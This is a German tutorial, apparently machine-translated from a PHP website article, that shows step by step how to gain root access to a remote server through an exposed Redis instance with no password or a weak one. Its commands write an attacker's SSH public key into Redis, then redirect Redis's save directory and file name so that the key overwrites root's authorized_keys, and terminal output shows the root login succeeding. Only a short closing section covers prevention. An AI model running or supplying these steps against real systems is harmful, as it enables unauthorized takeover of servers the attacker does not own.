Dieser Artikel vermittelt Ihnen relevantes Wissen über das Mining-Prinzip von Redis. Hier zeigen wir, wie Sie mit Redis Berechtigungen erweitern, um den Root-Benutzer des Remote-Servers zu erhalten, und wie Sie ihn schützen können alle.
Empfohlenes Lernen: Redis-Video-Tutorial
Heute zeigen wir, wie man den Root-Benutzer des Remote-Servers durch Rechteausweitung über Redis erhält.
1. Zuerst brauchen wir einige Voraussetzungen
Bedingung 1: Sie müssen zuerst einen Redis haben und wir müssen seinen Port kennen [Standard 6379];
Bedingung 2: Redis-Passwort darf nicht zu komplex sein , oder kein Passwort;
Bedingung 3: Der Benutzer, der Redis startet, ist vorzugsweise ein Root-Benutzer, was destruktiver ist; 2.1 Erstellen Sie ein Paar Geheimnisse Der Schlüssel
wird über ssh-keygen generiert. Natürlich können Sie den vorhandenen problemlos verwenden.
root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsaAls nächstes wird der Angriffsschlüsselwert über den öffentlichen Schlüssel generiert
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kaliDer Zweck des Hinzufügens von zwei Zeilenumbrüchen davor und danach besteht darin, zu verhindern, dass die Daten miteinander verbunden werden und Fehlerprobleme verursachen.
2.2 Schlüssel für Redis konfigurieren
Der Vorgang ist wie folgt:root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar OKMelden Sie sich bei Redis an, um zu überprüfen, ob er in Redis geschrieben wurde.
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129 192.168.243.129:6379> get bar "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
2.3 Systemdateien über den Redis-Speichermechanismus ersetzen
192.168.243.129:6379> config set dir /root/.ssh OK 192.168.243.129:6379> config get dir 1) "dir" 2) "/root/.ssh" 192.168.243.129:6379> config set dbfilename "authorized_keys" OK 192.168.243.129:6379> save OK 192.168.243.129:6379> exitZu diesem Zeitpunkt melden wir uns beim Remote-Host an, um den Effekt zu sehen.
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129 The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established. ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts. Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1 root@kali:~#
3. So verhindern Sie
Redis muss die Passwortbeschränkungen erhöhen und es darf kein schwaches Passwort sein
Redis sollte versuchen, es nicht als Root-Benutzer zu verwenden.
Empfohlenes Lernen:
Redis-Video-TutorialDas obige ist der detaillierte Inhalt vonLassen Sie uns über die Prinzipien des Redis-Mining sprechen (detaillierte Beispiele). Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!